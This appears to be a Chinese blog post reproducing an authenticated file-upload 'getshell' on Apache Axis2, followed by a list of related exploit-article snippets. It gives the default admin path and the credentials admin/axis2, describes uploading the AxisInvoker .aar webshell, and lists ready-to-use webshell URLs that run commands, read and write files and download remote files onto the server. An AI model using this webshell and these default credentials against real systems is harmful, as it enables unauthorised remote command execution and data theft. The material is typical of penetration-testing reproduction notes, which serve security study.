0x00 前言

Apache Axis2是一个Web服务的核心支援引擎。AXIS2对旧有的AXIS重新设计及重写,并提供两种语言Java及C的开发版本。

事实上AXIS2 不只为WEB应用程序提供Web服务的界面,而且它也可以作为一个单独的服务器看待,而且很简单就能跟Apache Tomcat整合,目前AXIS2的最新版本是1.6.2。

Axis是一个开源、基于XML的Web服务架构。最开始由IBM公司研发,叫IBM-SOAP。后来由Apache基金会在SOAP的基础上推出了AXIS。AXIS本质是一个Java语言编写的SOAP引擎。利用它我们可以在各种分布式应用中,让各个应用能够彼此操作、交互。

0x01 漏洞复现

默认端口:8089

默认后台路径:/axis2-admin/login

默认账号密码:admin/axis2

选择Tools-“ Upload Service ”上传aar包 进行 getshell

成功后会提示“ File AxisInvoker.aar successfully uploaded  ”

http://xxx.xxx.xxx.xxx/axis2/services/Cat/exec?cmd=ipconfig

0x02 使用方法

马子的使用方法:

支持的命令:
exec-运行命令,在Linux / Windows上均可使用,不用担心。http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=whoami写-写文件http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123info-显示某些信息,根据需要进行修改http://192.168.56.103:8080/axis2/services/AxisInvoker/info读取-读取文件内容http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini下载-下载文件并将其保存在某处http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt

下载地址:https://github.com/CaledoniaProject/AxisInvoker

转载请注明:Adminxe's Blog » Apache Axis2 后台文件上传getshell 漏洞复现

Apache Axis2 后台文件上传getshell 漏洞复现相关推荐

  1. 通达+oa+php+文件+乱,通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现...

    0x00 简介 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠.数据存取集中控制,避免了数据泄漏的可能.提供数据备份工具,保护系统数据安全.多级 ...

  2. 致远OA ajax.do 任意文件上传 (CNVD-2021-01627) 漏洞复现

    为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓ 01 漏洞描述 02 影响范围 03 验证方式 04 利用方式 05 修复方案 01 漏洞描述 致远OA是一套办公协同管理软件.由于致远OA旧版本某 ...

  3. 某OA ajax.do 未授权漏洞任意文件上传getshell复现

    某OA ajax.do 未授权漏洞任意文件上传getshell复现 0x00 简介 某OA A8 是一款流行的协同管理软件,在各中.大型企业机构中广泛使用. 由于某旧版本某些接口能被未授权访问,并且部 ...

  4. 漏洞案例之z-blog后台文件上传

    z-blog后台文件上传 后台登录地址 php版本后台登录地址:你的域名/zb_system/login.php asp版本后台登录地址:后缀为/zb_system/login.asp zblogge ...

  5. 记一次对DZ的渗透.(一句话木马与图片,文件上传解析漏洞)

    一.举例:St0rs Team 指剑碎星河分享 前言0X01 某日某帅正在使用着啊D 入侵百度的时候, 突然某位好友发来一条消息. "滴滴上车" 打开消息一看,说是要某帅帮忙日一个 ...

  6. web文件上传-0x00漏洞

    文件上传-0x00漏洞 题目:2016全国大学生信息安全竞赛-web文件上传 原理 0x00漏洞:也称为%00阻断漏洞,0x00漏洞常见于Apache服务器后缀名称解析漏洞,不管文件最后后缀为什么,只 ...

  7. .htaccess文件上传解析漏洞

    测试环境 upload-labs靶场(Pass-04) .htaccess原理 .htaccess文件是Apache服务器下的一个配置文件.其主要负责相关目录下的网页配置,即:在一个特定的文档目录中放 ...

  8. java http 上传文件_java利用httpClient实现后台文件上传请求

    之前写过基于html和js的文件上传方法java 用springMVC 和HttpServletRequest 两种实现文件上传的方法和httpClient后台执行普通post请求的文章java通过h ...

  9. 0919文件上传-解析漏洞编辑器安全WAF绕过及安全修复

    其他漏洞 编辑器漏洞 网站在实现上传文章等功能时会套用第三方编辑器的功能 大部分编辑器漏洞都是文件上传漏洞 判断: 1.看界面 2.目录扫描 fkceditor.ewebeditor.ckeditor ...

最新文章

  1. 三代测序(SMRT Sequencing)
  2. 注册博客第一天,有些激动
  3. ios UIWebView 播放优酷土豆视频
  4. 专访友盟CEO叶谦:深挖海量终端用户数据的价值
  5. circRNA研究相关数据库,riboCIRC使用指南
  6. 一个进程可以创建多少线程?
  7. 面试题之丑数的C++实现求解(孤陋寡闻了,才知道丑数这么high的东东)
  8. web前端知识点太多_web前端常见知识点
  9. mvc:annotation-driven/浅析
  10. python中ttk详解_Python 中的Property 动态属性和特性详解
  11. Docker镜像、容器的理解和使用方法
  12. Win7小工具“美女报时”,搜道版,v1.0.4.0
  13. 我的世界服务器自定义翅膀,我的世界翅膀自定义皮肤period; | 手游网游页游攻略大全...
  14. 模仿支付宝支付成功特效:svg圆圈转动+打钩
  15. DIY兼容机装苹果系统
  16. 华为服务器RH2288 V2 BIOS配置
  17. Bella Chat Tech Support
  18. ₣Y2XAEfuV1₳ 这缎,登陸块守,友爱
  19. Unity的gamma矫正、颜色空间及其转换的问题
  20. 常用图标png、ico 图标下载,图片格式转换为ico

热门文章

  1. 试题 算法训练 A的B的C次方次方
  2. 【C语言】求自然对数的底e 03
  3. el-tabel-coumn中label换行
  4. 【读书笔记】《人月神话》的观点:是或非?
  5. 中职c语言程序设计案例教学,中职C语言教学中案例教学法新探.doc
  6. Process Explorer简易图文教程
  7. 激光雷达与相机外参标定(附open3d python代码)
  8. steps步骤条+上一步+下一步
  9. 润和软件OpenHarmony生态共建实践
  10. [Tjoi2016Heoi2016]【BZOJ 4553】【JZOJ 4606】序列